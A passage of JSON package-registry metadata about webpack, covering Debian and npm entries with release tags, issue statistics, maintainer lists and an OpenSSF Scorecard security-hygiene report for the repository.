c3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-29T01:17:03.718Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/node-webpack?arch=source\u0026distro=debian-13\u0026repository_url=https://packages.debian.org/trixie","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T00:23:50.084Z","issues_count":10165,"pull_requests_count":9442,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2769754.713370066,"issues_closed_count":9898,"pull_requests_closed_count":8893,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.834825381210035,"avg_comments_per_pull_request":3.180152510061428,"merged_pull_requests_count":6029,"bot_issues_count":8,"bot_pull_requests_count":2914,"past_year_issues_count":80,"past_year_pull_requests_count":937,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":363604.70405405405,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":740,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.45,"past_year_avg_comments_per_pull_request":4.890074706510139,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":586,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1083,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":438,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"debian-13","url":"https://packages.debian.org/trixie","ecosystem":"debian","default":false,"packages_count":38024,"maintainers_count":0,"namespaces_count":4,"keywords_count":1985,"github":"debian","metadata":{"codename":"trixie","funded_packages_count":1833},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:50.448Z","updated_at":"2026-09-02T05:05:34.997Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/namespaces"}},{"id":2566300,"name":"webpack-4.17.1","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2018-10-09T05:34:16.620Z","latest_release_published_at":"2018-10-09T05:34:16.620Z","latest_release_number":"4.17.1","last_synced_at":"2026-09-03T00:19:16.937Z","created_at":"2022-04-10T03:37:22.520Z","updated_at":"2026-09-03T00:19:16.937Z","registry_url":"https://www.npmjs.com/package/webpack-4.17.1","install_command":"npm install webpack-4.17.1","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.17.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 